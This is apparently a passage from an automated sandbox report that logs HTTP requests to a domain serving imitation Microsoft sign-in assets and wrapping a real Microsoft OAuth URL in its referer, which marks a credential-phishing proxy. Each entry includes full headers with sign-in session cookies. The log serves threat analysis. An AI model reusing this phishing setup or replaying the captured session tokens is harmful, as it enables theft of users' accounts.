TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==&sso_reload=trueAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrAvF9VazivTmPjaw1zPF1i3dl_I0Em_rxID5G6YgAA; esctx-rd9uwk5JNAs=AQABCQE
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_0lh3lajrog_lmhvtw2rbbq2.js HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==&sso_reload=trueAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrAvF9VazivTmPjaw1zPF1i3dl_I0Em_rxID5G6YgAA; esctx-
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.js HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==&sso_reload=trueAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrAvF9VazivTmPjaw1zPF1i3dl_I0Em_rxID5G6YgAA; esctx-rd9uwk5JNAs=AQABCQEAAABVrSpeuWamRam2j
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==&sso_reload=trueAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrAvF9VazivTmPja
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_ae573f441ee1cf781ec7.js HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==&sso_reload=trueAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrAvF9VazivTmPjaw1zPF1i3dl_I0Em_rxID5G6YgAA;
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==&sso_reload=trueAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5L
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZj